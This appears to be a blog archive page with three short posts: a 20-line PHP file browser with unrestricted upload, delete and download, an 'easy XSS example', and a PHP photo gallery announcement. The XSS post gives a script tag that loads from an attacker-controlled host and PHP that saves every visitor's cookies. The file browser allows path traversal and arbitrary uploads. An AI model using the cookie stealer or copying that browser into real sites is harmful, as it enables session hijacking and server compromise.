script

A 20 rows filebrowser-ftp client script in PHP

Here’s an example of a minimal filebrowser script, similar to a remote ftp client. You can clearly browse files, download them, delete and upload new ones.

<?php
if(isset($_GET['p']) && $_GET['p'])
    if(is_file($_GET['p'])){
        header('Content-Disposition: attachment; filename="'.basename($_GET['p']).'"');
        die(file_get_contents($_GET['p']));
    }else
        chdir(realpath($_GET['p']));
$base_path=getcwd().DIRECTORY_SEPARATOR;
if(isset($_FILES['f']['tmp_name']) && $_FILES['f']['tmp_name'])
    move_uploaded_file($_FILES['f']['tmp_name'], $base_path.$_FILES['f']['name']);
if(isset($_GET['d']) && is_file($base_path.$_GET['d']))
    unlink($base_path.$_GET['d']);
$files=scandir($base_path);
$html_list='';
foreach($files as $file){
    $p=urlencode($base_path.$file);
    $html_list.="<li><a href=\"?p=".$p."\">$file</a> ".((is_file($base_path.$file))?"| <a href=\"?p=$p&d=$file\">delete</a>":"")."</li>";
}
$form_upload='<form action="" method="POST" enctype="multipart/form-data"><input type="file" name="f" /><input type="submit" />';
echo "<h1>".getcwd()."</h1>$form_upload<ul>$html_list</ul>";

And here a screenshot:

Pay attention, this script is not production ready. It is only an experiment to demostrate the minimun work to create a complete file browser script. Put it on a public website could be dangerous.

Javascript Hack – easy XSS example

You can find tons of cross site scripting hacks. I would alert you with a common and easy to do type.

The first step is to insert a javascript include tag in a shared webservice user page :

<script language="javascript" src="http://yoursite.com/cookiejar.php"></script>

Second, you need to put a script at http://yoursite.com/cookiejar.php, with the following code:

<?php
if(!is_array($_COOKIE)) die();
foreach($_COOKIE as $cookie_name => $cookie_value)
    file_put_contents('cookiejar.txt',
                         $cookie_name.':'.$cookie_value."\n",
                         FILE_APPEND);

If the website allows you to put a raw html or tags, after a while you will see all the user cookies will visit the page with the tag you inserted.

So, you should never trust a user generated content. The better way to avoid XSS is to use an advanced web framework, like Django, Rails or Symfony. But if you are creating your own code project remember always to parse the user input, strip the tags or convert all the text in urlencoding.

PHP photo gallery all in one

You have a lot of images and don’t want a fancy Flickr or big framework (ex zenphoto) to show them. You want only put your image folders on an ftp server and show them to the world. Easy as 123. Mininim album could be a one shot solution.

I wrote it several years ago and now I decided to dust and share it because a lot of friends ask me a simple solution to have a nice web gallery of their holiday pictures or a simple photo portfolio.

This script requires only a Linux server and PHP (4 or 5) with obviously  GD library enabled. You don’t have to worry about this requirements. The simplest thing you can do is to put the file on your server and open the page into the browser. If something goes wrong, you will see an error ;)

The install process is simple, because doesn’t exists :)
Download the file from the repository and put the “index.php” file on the server. In the same directory put your image folders.

Ex.:

$ hg clone https://ifabio@bitbucket.org/ifabio/mininim-album/

You can also download the file from the repository as zip.

Use your ftp client (Cyberduck or Filezilla) to upload the file and your images. Remember to put always the images into a separate folder.

Enjoy! You can see a live demo on album.mininim.org

Report a bug.